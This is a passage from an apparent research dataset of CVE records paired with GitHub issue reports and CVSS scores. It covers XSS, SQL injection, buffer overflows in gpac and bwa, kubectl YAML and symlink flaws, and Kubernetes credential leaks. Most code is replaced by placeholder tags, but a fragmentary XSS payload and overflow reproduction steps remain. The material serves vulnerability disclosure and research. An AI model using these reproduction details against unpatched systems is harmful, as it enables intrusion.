  34172. "description": "Stored XSS in \"SNMP community string\" field . Describe the bug There's no escape being done before printing out the value of ERRORTAG (SNMP Options) in the View poller cache . To Reproduce Steps to reproduce the behavior NUMBERTAG Login as normal user ( should have device creation explicitly enabled NUMBERTAG Select create a new device from the console menu NUMBERTAG Enter the below shared payload into the \" ERRORTAG APITAG alert('XSS'); APITAG APITAG APITAG Admin CODETAG APITAG . ' ' . $item['snmp_community'] `",
  34173. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  34174. "severity": "MEDIUM",
  34175. "baseScore": 5.4,
  34176. "impactScore": 2.7,
  34177. "exploitabilityScore": 2.3
  34178. },
  34179. {
  34180. "CVE_ID": "CVE-2019-11027",
  34181. "Issue_Url_old": "https://github.com/openid/ruby-openid/issues/122",
  34182. "Issue_Url_new": "https://github.com/openid/ruby-openid/issues/122",
  34183. "Repo_new": "openid/ruby-openid",
  34184. "Issue_Created_At": "2019-06-11T13:50:34Z",
  34185. "description": "Question concerning CVETAG . Hi, I have a question concerning the recent CVE NUMBERTAG Could you provide some background on which version/commit fixes the issue? Rubygems NUMBERTAG only shows version NUMBERTAG Was version NUMBERTAG pulled because of the CVE or was NUMBERTAG just not uploaded by accident ? Thanks NUMBERTAG URLTAG NUMBERTAG URLTAG",
  34186. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34187. "severity": "CRITICAL",
  34188. "baseScore": 9.8,
  34189. "impactScore": 5.9,
  34190. "exploitabilityScore": 3.9
  34191. },
  34192. {
  34193. "CVE_ID": "CVE-2019-11038",
  34194. "Issue_Url_old": "https://github.com/libgd/libgd/issues/501",
  34195. "Issue_Url_new": "https://github.com/libgd/libgd/issues/501",
  34196. "Repo_new": "libgd/libgd",
  34197. "Issue_Created_At": "2019-05-31T20:28:02Z",
  34198. "description": "Uninitialized read in APITAG ( CVETAG ). There is a GD-related issue fixed in PHP NUMBERTAG and NUMBERTAG which was assigned CVETAG and is in the PHP bug CVETAG . Filing the issue for the correlated issue in the libgd library itself.",
  34199. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  34200. "severity": "MEDIUM",
  34201. "baseScore": 5.3,
  34202. "impactScore": 1.4,
  34203. "exploitabilityScore": 3.9
  34204. },
  34205. {
  34206. "CVE_ID": "CVE-2019-11082",
  34207. "Issue_Url_old": "https://github.com/dkpro/dkpro-core/issues/1325",
  34208. "Issue_Url_new": "https://github.com/dkpro/dkpro-core/issues/1325",
  34209. "Repo_new": "dkpro/dkpro-core",
  34210. "Issue_Created_At": "2019-02-12T13:00:10Z",
  34211. "description": "Avoid datasets being extracted outside their target directory. It should be ensured that datasets are only extracted inside their respective cache folder.",
  34212. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  34213. "severity": "HIGH",
  34214. "baseScore": 7.5,
  34215. "impactScore": 3.6,
  34216. "exploitabilityScore": 3.9
  34217. },
  34218. {
  34219. "CVE_ID": "CVE-2019-11221",
  34220. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1203",
  34221. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1203",
  34222. "Repo_new": "gpac/gpac",
  34223. "Issue_Created_At": "2019-02-12T03:44:32Z",
  34224. "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in gf_import_message () function, media_import.c APITAG overflow when srt file contains more than one txt line and the line is long enough, please see attached crafted file. FILETAG APITAG APITAG import, APITAG e, char format, ...) { if APITAG e ? GF_LOG_WARNING : GF_LOG_INFO)) { va_list args; char APITAG va_start(args, format); APITAG format, args); va_end(args); GF_LOG((u NUMBERTAG e ? GF_LOG_WARNING : GF_LOG_INFO), GF_LOG_AUTHOR, (\"%s \", APITAG ); } return e; } PATHTAG (gdb) set args srt NUMBERTAG crafted_text.srt (gdb) r Starting program: PATHTAG srt NUMBERTAG crafted_text.srt APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Bad SRT formatting expecting number got \"hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hel\" stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted 
NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG a4 in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG fbbc in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG fb NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG eb in gf_import_message (import NUMBERTAG fffffff9b NUMBERTAG e=GF_CORRUPTED_DATA, format NUMBERTAG ffff7b3d7f0 APITAG SRT formatting expecting number got %s \") at APITAG NUMBERTAG ffff NUMBERTAG db NUMBERTAG in gf_text_import_srt (import NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in gf_import_timed_text (import NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ded NUMBERTAG in gf_media_import (importer NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG c NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG patch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team",
  34225. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34226. "severity": "HIGH",
  34227. "baseScore": 7.8,
  34228. "impactScore": 5.9,
  34229. "exploitabilityScore": 1.8
  34230. },
  34231. {
  34232. "CVE_ID": "CVE-2019-11222",
  34233. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1205",
  34234. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1205",
  34235. "Repo_new": "gpac/gpac",
  34236. "Issue_Created_At": "2019-02-13T09:49:56Z",
  34237. "description": "buffer overflow issue NUMBERTAG there is a buffer overflow issue for crypt feature when use a FILETAG file. overflow occur when use a crafted ID NUMBERTAG alue. PATHTAG gdb APITAG (gdb) set args crypt FILETAG overview.mp4 out overview_encrypted.mp4 (gdb) r Starting program: PATHTAG crypt FILETAG overview.mp4 out overview_encrypted.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG [CORE NUMBERTAG bit blob is not NUMBERTAG bytes long: APITAG [XML/NHML] Cannot parse ID NUMBERTAG stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG a4 in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG fbbc in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG fb NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG in gf_xml_parse_bit_sequence_bs (bsroot NUMBERTAG d0, bs NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f in gf_xml_parse_bit_sequence (bsroot NUMBERTAG d0, data NUMBERTAG ffffffbdcb8, data_size NUMBERTAG ffffffbdc NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in gf_cenc_parse_drm_system_info (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7db APITAG at APITAG NUMBERTAG ffff NUMBERTAG ec in gf_crypt_file (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7db APITAG at APITAG NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG If you indentify this issue as a vulnerability, please provide me with following 
information NUMBERTAG the affected versions NUMBERTAG patch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team",
  34238. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34239. "severity": "HIGH",
  34240. "baseScore": 7.8,
  34241. "impactScore": 5.9,
  34242. "exploitabilityScore": 1.8
  34243. },
  34244. {
  34245. "CVE_ID": "CVE-2019-11222",
  34246. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1204",
  34247. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1204",
  34248. "Repo_new": "gpac/gpac",
  34249. "Issue_Created_At": "2019-02-13T07:12:39Z",
  34250. "description": "buffer overflow issue NUMBERTAG there is a buffer overflow issue for crypt feature when use a FILETAG file. PATHTAG gdb APITAG (gdb) set args crypt FILETAG overview.mp4 out overview_encrypted.mp4 (gdb) r Starting program: PATHTAG crypt FILETAG overview.mp4 out overview_encrypted.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG [CORE NUMBERTAG bit blob is not NUMBERTAG bytes long: APITAG [CENC] Cannnot parse key value Error in ERRORTAG %s': %s NUMBERTAG s \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG e in malloc_printerr (ptr=<optimized out>, str NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG corrupted unsorted chunks\", action NUMBERTAG at APITAG NUMBERTAG int_free (av=<optimized out>, p=<optimized out>, have_lock NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e1b in APITAG () from PATHTAG NUMBERTAG ffff NUMBERTAG d9 in gzclose_r () from PATHTAG NUMBERTAG ffff NUMBERTAG fd in xml_sax_read_file (parser NUMBERTAG ba NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG db2 in gf_xml_sax_parse_file (parser NUMBERTAG ba NUMBERTAG APITAG APITAG APITAG at APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG a in load_crypt_file (file NUMBERTAG fffffffe7d3 APITAG at APITAG NUMBERTAG ffff NUMBERTAG ad in gf_crypt_file (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7d3 APITAG at APITAG NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb)",
  34251. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34252. "severity": "HIGH",
  34253. "baseScore": 7.8,
  34254. "impactScore": 5.9,
  34255. "exploitabilityScore": 1.8
  34256. },
  34257. {
  34258. "CVE_ID": "CVE-2019-11236",
  34259. "Issue_Url_old": "https://github.com/urllib3/urllib3/issues/1553",
  34260. "Issue_Url_new": "https://github.com/urllib3/urllib3/issues/1553",
  34261. "Repo_new": "urllib3/urllib3",
  34262. "Issue_Created_At": "2019-03-18T17:17:07Z",
  34263. "description": "CRLF injection vulnerability. At CVETAG there's an issue in Python's urllib that an attacker controlling the request parameter can inject headers by injecting CR/LF chars. A commenter mentions that the same bug is present in urllib3: CVETAG So reporting it here to make sure it gets attention.",
  34264. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34265. "severity": "MEDIUM",
  34266. "baseScore": 6.1,
  34267. "impactScore": 2.7,
  34268. "exploitabilityScore": 2.8
  34269. },
  34270. {
  34271. "CVE_ID": "CVE-2019-11243",
  34272. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/76797",
  34273. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/76797",
  34274. "Repo_new": "kubernetes/kubernetes",
  34275. "Issue_Created_At": "2019-04-18T21:31:53Z",
  34276. "description": "CVETAG NUMBERTAG APITAG does not remove the serviceaccount credentials from config created by APITAG The APITAG method return a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the following versions, APITAG did not effectively clear service account credentials loaded using APITAG NUMBERTAG What is the impact? APITAG users that use the APITAG method directly with client config loaded with APITAG receive back a client config which can still send the loaded service account token with requests. How was the issue fixed? In NUMBERTAG and NUMBERTAG APITAG was modified to return a client config that is safe to use with the APITAG method ( URLTAG In NUMBERTAG the APITAG will also exclude the APITAG and APITAG fields, in addition to the explicit credential carrying fields. ( URLTAG How do I resolve the issue? Upgrade APITAG to APITAG , APITAG , APITAG , or higher or manually clear the APITAG and APITAG fields in addition to calling APITAG Thanks to Oleg Bulatov for reporting this issue. /area security /kind bug /sig auth /sig api machinery /assign /close",
  34277. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34278. "severity": "HIGH",
  34279. "baseScore": 8.1,
  34280. "impactScore": 5.9,
  34281. "exploitabilityScore": 2.2
  34282. },
  34283. {
  34284. "CVE_ID": "CVE-2019-11244",
  34285. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/76676",
  34286. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/76676",
  34287. "Repo_new": "kubernetes/kubernetes",
  34288. "Issue_Created_At": "2019-04-16T20:14:25Z",
  34289. "description": "World writeable http cache. What happened: The files inside of \".kube/http cache\" are world writeable (rw rw rw ). While the default for these files appears to be the home directory, using the \" cache dir\" flag could put these files into a place where world writeable files would allow any user / process to modify the cache files. Modification of the cache files could influence the kubectl utility in a negative way for other users. What you expected to happen: Apply stricter file permissions to the http cache files. How to reproduce it (as minimally and precisely as possible): Run any generic kubectl command which is successful and then list the cache directory PATHTAG $ kubectl get pods all namespaces $ ls la PATHTAG Anything else we need to know?: I estimate this is a low severity security issue with a CVSS score of NUMBERTAG PATHTAG URLTAG Environment: Linux Kubernetes version (use kubectl APITAG Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Server Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Cloud provider or hardware configuration: AWS. Running kube api server in hyperkube. OS (e.g: cat /etc/os release): APITAG Linux\" APITAG APITAG ID=\"centos\" ID_LIKE=\"rhel fedora\" VERSION_ID NUMBERTAG APITAG Linu NUMBERTAG APITAG ANSI_COLOR NUMBERTAG APITAG HOME_URL=\" FILETAG \" BUG_REPORT_URL=\" CVETAG \" APITAG NUMBERTAG APITAG APITAG APITAG APITAG Kernel (e.g. uname a): Linux APITAG NUMBERTAG APITAG NUMBERTAG SMP Tue Aug NUMBERTAG UTC NUMBERTAG APITAG Install tools: Manual installation. Others: n/a",
  34290. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  34291. "severity": "MEDIUM",
  34292. "baseScore": 5.0,
  34293. "impactScore": 3.6,
  34294. "exploitabilityScore": 1.3
  34295. },
  34296. {
  34297. "CVE_ID": "CVE-2019-11245",
  34298. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/78308",
  34299. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/78308",
  34300. "Repo_new": "kubernetes/kubernetes",
  34301. "Issue_Created_At": "2019-05-24T16:14:49Z",
  34302. "description": "Container uid changes after first restart. APITAG What happened : When I launch a pod from a docker image that specifies a USER in the Dockerfile, the container only runs as that user on its first launch. After that the container runs as UID NUMBERTAG What you expected to happen : I expect the container to act consistently every launch, and probably with the USER specified in the container. How to reproduce it (as minimally and precisely as possible) : Testing with minikube (same test specifying NUMBERTAG kubectl logs test always returns NUMBERTAG ERRORTAG Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): I get the results I expect in NUMBERTAG and NUMBERTAG The problem exists in NUMBERTAG and NUMBERTAG Cloud provider or hardware configuration: minikube NUMBERTAG using APITAG OS (e.g: APITAG ): Kernel (e.g. ERRORTAG ): Install tools: Network plugin and version (if this is a network related bug): Others:",
  34303. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34304. "severity": "HIGH",
  34305. "baseScore": 7.8,
  34306. "impactScore": 5.9,
  34307. "exploitabilityScore": 1.8
  34308. },
  34309. {
  34310. "CVE_ID": "CVE-2019-11247",
  34311. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/80983",
  34312. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/80983",
  34313. "Repo_new": "kubernetes/kubernetes",
  34314. "Issue_Created_At": "2019-08-05T12:44:08Z",
  34315. "description": "WIP Placeholder Issue NUMBERTAG Please don't remove or close this issue. I will be updating it later today. /area security",
  34316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  34317. "severity": "HIGH",
  34318. "baseScore": 8.1,
  34319. "impactScore": 5.2,
  34320. "exploitabilityScore": 2.8
  34321. },
  34322. {
  34323. "CVE_ID": "CVE-2019-11248",
  34324. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/81023",
  34325. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/81023",
  34326. "Repo_new": "kubernetes/kubernetes",
  34327. "Issue_Created_At": "2019-08-06T14:34:33Z",
  34328. "description": "CVETAG : /debug/pprof exposed on kubelet's healthz port. The debugging endpoint APITAG is exposed over the unauthenticated Kubelet healthz port. Versions prior to NUMBERTAG and NUMBERTAG are affected. The issue is of medium severity, but not exposed by the default configuration. If you are exposed we recommend upgrading to at least one of the versions listed. Am I vulnerable? By default, the Kubelet exposes unauthenticated healthz endpoints on port NUMBERTAG but only over localhost. If your nodes are using a non localhost APITAG ( health bind address), and an older version, you may be vulnerable. If your nodes are using the default localhost APITAG it is only exposed to pods or processes running in the host network namespace. Run kubectl get nodes to see whether nodes are running a vulnerable version. Run APITAG to check whether the APITAG is non local. How do I mitigate the vulnerability? Upgrade to a patched version NUMBERTAG or NUMBERTAG or, update node configurations to set the APITAG to APITAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG ulnerability Details The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Thanks to Jordan Zebor of F5 Networks for reporting this problem. /area security /close",
  34329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L",
  34330. "severity": "HIGH",
  34331. "baseScore": 8.2,
  34332. "impactScore": 4.2,
  34333. "exploitabilityScore": 3.9
  34334. },
  34335. {
  34336. "CVE_ID": "CVE-2019-11249",
  34337. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/80984",
  34338. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/80984",
  34339. "Repo_new": "kubernetes/kubernetes",
  34340. "Issue_Created_At": "2019-08-05T12:44:23Z",
  34341. "description": "WIP Placeholder Issue NUMBERTAG Please don't remove or close this issue. I will be updating it later today. /area security",
  34342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  34343. "severity": "MEDIUM",
  34344. "baseScore": 6.5,
  34345. "impactScore": 3.6,
  34346. "exploitabilityScore": 2.8
  34347. },
  34348. {
  34349. "CVE_ID": "CVE-2019-11250",
  34350. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/81114",
  34351. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/81114",
  34352. "Repo_new": "kubernetes/kubernetes",
  34353. "Issue_Created_At": "2019-08-08T02:03:04Z",
  34354. "description": "Bearer tokens are revealed in logs. This issue was reported in the FILETAG Description Kubernetes requires an authentication mechanism to enforce users\u2019 privileges. One method of authentication, bearer tokens, are opaque strings used to associate a user with their having successfully authenticated previously. Any user with possession of this token may masquerade as the original user (the \u201cbearer\u201d) without further authentication. Within Kubernetes, the bearer token is captured within the hyperkube kube apiserver system logs at high verbosity levels NUMBERTAG A malicious user with access to the system logs on such a system could masquerade as any user who has previously logged into the system. Exploit Scenario Alice logs into a Kubernetes cluster and is issued a Bearer token. The system logs her token. Eve, who has access to the logs but not the production Kubernetes cluster, replays Alice\u2019s Bearer token, and can masquerade as Alice to the cluster. Recommendation Short term, remove the Bearer token from the log. Do not log any authentication credentials within the system, including tokens, private keys, or passwords that may be used to authenticate to the production Kubernetes cluster, regardless of the logging level. Long term, either implement policies that enforce code review to ensure that sensitive data is not exposed in logs, or implement logging filters that check for sensitive data and remove it prior to outputting the log. In either case, ensure that sensitive data cannot be trivially stored in logs.",
  34355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  34356. "severity": "MEDIUM",
  34357. "baseScore": 6.5,
  34358. "impactScore": 3.6,
  34359. "exploitabilityScore": 2.8
  34360. },
  34361. {
  34362. "CVE_ID": "CVE-2019-11251",
  34363. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/87773",
  34364. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/87773",
  34365. "Repo_new": "kubernetes/kubernetes",
  34366. "Issue_Created_At": "2020-02-03T15:12:22Z",
  34367. "description": "CVETAG : kubectl cp symlink vulnerability. A security issue was discovered in kubectl versions NUMBERTAG and NUMBERTAG The issue is of a medium severity and upgrading of kubectl is encouraged to fix the vulnerability. Am I vulnerable? Run kubectl version client and if it returns versions NUMBERTAG and NUMBERTAG you are running a vulnerable version. How do I upgrade? Follow installation instructions here Install and Set Up kubectl Kubernetes NUMBERTAG Not all instructions will provide up to date kubectl versions at the time of this announcement. So, always confirm with kubectl version client. Vulnerability Details The details for this vulnerability are very similar to CVETAG and CVETAG . A vulnerability has been discovered in kubectl cp that allows a combination of two symlinks to copy a file outside of its destination directory. This could be used to allow an attacker to place a netfarious file using a symlink, outside of the destination tree. This issue is filed as CVETAG . Two fixes were formulated, one fix to remove symlink support going forwards and a fix with cherry picks made to ensure backwards compatibility. See URLTAG for the primary fix in NUMBERTAG which removes the support of symlinks in kubectl cp. After version NUMBERTAG symlink support with kubectl cp is removed, it is recommended instead to use a combination of exec+tar. A second fix has been made to NUMBERTAG and backported to NUMBERTAG and NUMBERTAG This changes the kubectl cp un tar symlink logic, by unpacking the symlinks after all the regular files have been unpacked. This then guarantees that a file can\u2019t be written through a symlink. 
See URLTAG for the fix to version NUMBERTAG The following Cherry picks were made from this fix to earlier versions of NUMBERTAG and NUMBERTAG See URLTAG for version NUMBERTAG See URLTAG for version NUMBERTAG Thank you to Erik Sj\u00f6lund ( APITAG for discovering this issue, Tim Allclair and Maciej Szulik for both fixes and the patch release managers for including the fix in their releases. /close",
  34368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  34369. "severity": "MEDIUM",
  34370. "baseScore": 5.7,
  34371. "impactScore": 3.6,
  34372. "exploitabilityScore": 2.1
  34373. },
  34374. {
  34375. "CVE_ID": "CVE-2019-11253",
  34376. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/83253",
  34377. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/83253",
  34378. "Repo_new": "kubernetes/kubernetes",
  34379. "Issue_Created_At": "2019-09-27T16:53:31Z",
  34380. "description": "Kubectl YAML parsing vulnerable to APITAG Laughs\" Attack.. Introduction Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question here URLTAG What happened : When creating a APITAG object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a APITAG Laughs\" attack URLTAG which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. CODETAG What you expected to happen : Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in APITAG but both tests I did NUMBERTAG client against NUMBERTAG Kubeadm cluster and NUMBERTAG client against NUMBERTAG kubeadm cluster) showed the CPU usage client side. How to reproduce it (as minimally and precisely as possible) : Get the manifest above and apply to a cluster as normal with APITAG . Use top or another CPU monitor to observe the quantity of CPU time used. Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): test NUMBERTAG linux AMD NUMBERTAG client, Kubeadm cluster running in kind) CODETAG test NUMBERTAG APITAG AMD NUMBERTAG client, Kubeadm cluster running in APITAG Workstation) CODETAG",
  34381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34382. "severity": "HIGH",
  34383. "baseScore": 7.5,
  34384. "impactScore": 3.6,
  34385. "exploitabilityScore": 3.9
  34386. },
  34387. {
  34388. "CVE_ID": "CVE-2019-11254",
  34389. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89535",
  34390. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89535",
  34391. "Repo_new": "kubernetes/kubernetes",
  34392. "Issue_Created_At": "2020-03-26T18:55:26Z",
  34393. "description": "WIP.",
  34394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  34395. "severity": "MEDIUM",
  34396. "baseScore": 6.5,
  34397. "impactScore": 3.6,
  34398. "exploitabilityScore": 2.8
  34399. },
  34400. {
  34401. "CVE_ID": "CVE-2019-11255",
  34402. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/85233",
  34403. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/85233",
  34404. "Repo_new": "kubernetes/kubernetes",
  34405. "Issue_Created_At": "2019-11-13T20:57:31Z",
  34406. "description": "WIP Placeholder. APITAG",
  34407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  34408. "severity": "MEDIUM",
  34409. "baseScore": 6.5,
  34410. "impactScore": 5.2,
  34411. "exploitabilityScore": 1.2
  34412. },
  34413. {
  34414. "CVE_ID": "CVE-2019-11359",
  34415. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/138",
  34416. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/138",
  34417. "Repo_new": "mkucej/i-librarian",
  34418. "Issue_Created_At": "2019-04-17T12:19:38Z",
  34419. "description": "XSS vulnerability in FILETAG . Summary The parameter project is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. APITAG APITAG Details The flaw exists since APITAG was assigned to a GET parameter without sanitizing APITAG then, APITAG was printed without escaping CODETAG",
  34420. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34421. "severity": "MEDIUM",
  34422. "baseScore": 6.1,
  34423. "impactScore": 2.7,
  34424. "exploitabilityScore": 2.8
  34425. },
  34426. {
  34427. "CVE_ID": "CVE-2019-11362",
  34428. "Issue_Url_old": "https://github.com/rocboss/ROCBOSS/issues/12",
  34429. "Issue_Url_new": "https://github.com/rocboss/rocboss-old/issues/12",
  34430. "Repo_new": "rocboss/rocboss-old",
  34431. "Issue_Created_At": "2019-04-18T05:49:41Z",
  34432. "description": "ROCBOSS NUMBERTAG has SQL injection via the APITAG score parameter. Verify that sql injection requires registration and score NUMBERTAG URLTAG ERRORTAG URLTAG The $score is not filtered, and the sql statement query is directly executed. APITAG roc_user SET score APITAG score APITAG uid APITAG send http request: APITAG CODETAG FILETAG",
  34433. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34434. "severity": "CRITICAL",
  34435. "baseScore": 9.8,
  34436. "impactScore": 5.9,
  34437. "exploitabilityScore": 3.9
  34438. },
  34439. {
  34440. "CVE_ID": "CVE-2019-11371",
  34441. "Issue_Url_old": "https://github.com/lh3/bwa/issues/239",
  34442. "Issue_Url_new": "https://github.com/lh3/bwa/issues/239",
  34443. "Repo_new": "lh3/bwa",
  34444. "Issue_Created_At": "2019-04-16T17:43:42Z",
  34445. "description": "[bwa_index] Pack FASTA... buffer overflow detected . I found a buffer overflow in [bns_fasta2bntseq] function. CODETAG The name buffer has only NUMBERTAG bytes, in order that buffer overflow occurs if we pass more than NUMBERTAG bytes as prefix.",
  34446. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34447. "severity": "CRITICAL",
  34448. "baseScore": 9.8,
